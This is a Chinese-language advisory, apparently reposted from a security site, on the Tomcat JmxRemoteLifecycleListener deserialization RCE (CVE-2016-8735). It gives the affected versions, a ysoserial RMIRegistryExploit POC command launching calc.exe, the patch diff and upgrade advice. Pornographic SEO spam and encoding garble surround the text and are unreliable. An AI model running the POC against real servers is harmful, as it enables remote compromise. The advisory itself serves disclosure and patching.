99久久国产综合精品国_亚洲av日韩aⅴ电影_午夜福利在线电影_亚洲aⅤ色欲久久一区二区三区_91九色蝌蚪国产精品_亚洲av无码乱码在线观看四虎_4国产精品无码制服丝袜_亚洲Av成人五月天在线观看_牛牛成人永久免费视频_午夜福利在线资源


【漏洞預(yù)警】Apache Tomcat多版本遠(yuǎn)程代碼執(zhí)行CVE-2016-8735(附POC)

本文原創(chuàng)作者:0c0c0f

來源:安全客

t01adabfae49a8ceb09

背景介紹

Tomcat是由Apache軟件基金會(huì)下屬的Jakarta項(xiàng)目開發(fā)的一個(gè)Servlet容器,按照Sun Microsystems提供的技術(shù)規(guī)范,實(shí)現(xiàn)了對(duì)Servlet和JavaServer Page(JSP)的支持,并提供了作為Web服務(wù)器的一些特有功能,如Tomcat管理和控制平臺(tái)、安全域管理和Tomcat閥等。Tomcat 很受廣大程序員的喜歡,因?yàn)樗\(yùn)行時(shí)占用的系統(tǒng)資源小,擴(kuò)展性好,支持負(fù)載平衡與郵件服務(wù)等開發(fā)應(yīng)用系統(tǒng)常用的功能。

漏洞描述

Oracle修復(fù)了JmxRemoteLifecycleListener反序列化漏洞(CVE-2016-3427)。 Tomcat也使用了JmxRemoteLifecycleListener這個(gè)監(jiān)聽器,但是Tomcat并沒有及時(shí)升級(jí),所以存在這個(gè)遠(yuǎn)程代碼執(zhí)行漏洞。

受影響版本:

Apache Tomcat 9.0.0.M1 to 9.0.0.M11

Apache Tomcat 8.5.0 to 8.5.6

Apache Tomcat 8.0.0.RC1 to 8.0.38

Apache Tomcat 7.0.0 to 7.0.72

Apache Tomcat 6.0.0 to 6.0.47

 

影響場景:

Zabbix 2.0 已經(jīng)將 JMX 監(jiān)控加入了系統(tǒng)中,本身不再依賴第三方工具。這是得對(duì) Tomcat 應(yīng)用以及其他 Java 應(yīng)用的監(jiān)控更加簡單。本文簡單的介紹 Zabbix 使用 JMX 方式監(jiān)控 Tomcat 的過程。

漏洞驗(yàn)證代碼(POC):

測試版本:tomcat版本8.0.36

conf/server.xml增加配置,添加catalina-jmx-remote.jar包,修改catalina文件配置

t01314e25e7db6eb5c4

t01c952cd2790458d9d

F:\HackTools\EXP>java -cp ysoserial-master-v0.0.4.jar ysoserial.exploit.RMIRegistryExploit localhost 10001 Groovy1 calc.exe

t01278e3c0fa9170442

這個(gè)漏洞還有其它利用姿勢,危害巨大,因此改變JMX密碼認(rèn)證十分有必要!

補(bǔ)丁代碼:

Diff of /tomcat/trunk/webapps/docs/changelog.xml

?Parent Directory?|??Revision Log?|??Patch

1
2
3
4
5
6
7
8
9
10
11
12
---?tomcat/trunk/webapps/docs/changelog.xml??? 2016/11/02?11:57:28??? 1767643
+++?tomcat/trunk/webapps/docs/changelog.xml??? 2016/11/02?11:57:36??? 1767644
@@?-97,6?+97,10?@@
?????????StoreConfig?component?includes?the?executor?name?when?writing?the
?????????Connector?configuration.?(markt)
???????</fix>
+??????<fix>
+????????When?configuring?the?JMX?remote?listener,?specify?the?allowed?types?for
+????????the?credentials.?(markt)
+??????</fix>
?????</changelog>
???</subsection>

/tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java

?Parent Directory?|??Revision Log?|??Patch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
---?tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java?? 2016/11/02?11:57:28??? 1767643
+++?tomcat/trunk/java/org/apache/catalina/mbeans/JmxRemoteLifecycleListener.java?? 2016/11/02?11:57:36??? 1767644
@@?-264,6?+264,10?@@
?????????????????serverCsf?=?new?RmiClientLocalhostSocketFactory(serverCsf);
?????????????}
?
+????????????env.put("jmx.remote.rmi.server.credential.types",?new?String[]?{
+????????????????????String[].class.getName(),
+????????????????????String.class.getName()?});
+
?????????????//?Populate?the?env?properties?used?to?create?the?server
?????????????if?(serverCsf?!=?null)?{
?????????????????env.put(RMIConnectorServer.RMI_CLIENT_SOCKET_FACTORY_ATTRIBUTE,?serverCsf);
@@?-328,7?+332,7?@@
?????????????cs?=?new?RMIConnectorServer(serviceUrl,?theEnv,?server,
?????????????????????ManagementFactory.getPlatformMBeanServer());
?????????????cs.start();
-????????????registry.bind("jmxrmi",?server);
+????????????registry.bind("jmxrmi",?server.toStub());
?????????????log.info(sm.getString("jmxRemoteLifecycleListener.start",
?????????????????????Integer.toString(theRmiRegistryPort),
?????????????????????Integer.toString(theRmiServerPort),?serverName));

解決辦法:

升級(jí)到不受影響版本

不受影響版本列表:

Upgrade to Apache Tomcat 9.0.0.M13 or later? (Apache Tomcat 9.0.0.M12 has the fix but was not released)

Upgrade to Apache Tomcat 8.5.8 or later? (Apache Tomcat 8.5.7 has the fix but was not released)

Upgrade to Apache Tomcat 8.0.39 or later

Upgrade to Apache Tomcat 7.0.73 or later

Upgrade to Apache Tomcat 6.0.48 or later

參考漏洞來源:

http://seclists.org/oss-sec/2016/q4/502

http://engineering.pivotal.io/post/java-deserialization-jmx/

http://svn.apache.org/viewvc?view=revision&revision=1767644

原文地址:http://bobao.#/learning/detail/3260.html

上一篇
下一篇

聯(lián)系我們:cert@chaosec.com